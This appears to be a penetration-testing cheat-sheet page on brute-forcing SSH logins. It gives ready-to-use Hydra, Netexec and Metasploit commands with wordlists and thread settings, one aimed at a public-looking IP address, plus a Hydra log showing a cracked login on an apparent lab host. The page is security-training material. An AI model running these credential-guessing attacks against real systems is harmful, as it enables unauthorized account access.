SSH Bruteforce

Hydra

Tips: Bruteforce FTP instead SSH if possible, it is faster

hydra -L user.list -P password.list ssh://[IP]

-t: number of thread

hydra will suggest that we add the -t 4 flag for a max number of parallel attempts, as many SSH limit the number of parallel connections and drop other connections, resulting in many of our attempts being dropped

hydra -L bill.txt -P william.txt -u -f ssh://178.35.49.134:22 -t 4

$ hydra -L user.list -P password.list ssh://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197   login: user   password: password
1 of 1 target successfully completed, 1 valid password found

Nmap - see SSH (22)

Netexec - CME

nxc ssh 10.129.245.201 -u sam -p mut_password.list

Metasploit

msf6 auxiliary(scanner/ssh/ssh_login) >

PreviousSMTP Bruteforce NextWinRM Bruteforce

Last updated 4 months ago